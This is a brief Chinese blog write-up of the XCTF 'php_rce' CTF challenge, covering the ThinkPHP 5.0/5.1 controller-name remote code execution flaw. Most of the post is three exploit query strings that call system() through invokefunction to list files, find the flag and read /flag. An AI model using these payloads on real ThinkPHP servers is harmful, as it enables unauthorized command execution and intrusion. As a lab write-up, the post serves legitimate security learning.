XCTF web php_rce (thinkphp)-白红宇的个人博客

XCTF web php_rce (thinkphp)

发布日期：2021-05-07 06:19:21 浏览次数：16 分类：精选文章

本文共 434 字，大约阅读时间需要 1 分钟。

thinkphp5.0和5.1由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞，受

影响的版本包括5.0和5.1版本。

测试是否可以getshell

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system& vars[1][]=ls

成功返回信息，确定存在漏洞

接着查询有flag的文件

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name "flag"

查看文件信息

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag"

上一篇：XCTF web Web_php_include (php://过滤)

下一篇：局域网内网络阻断小代码

关于作者

喝酒易醉，品茶养心，人生如梦，品茶悟道，何以解忧？唯有杜康！

-- 愿君每日到此一游！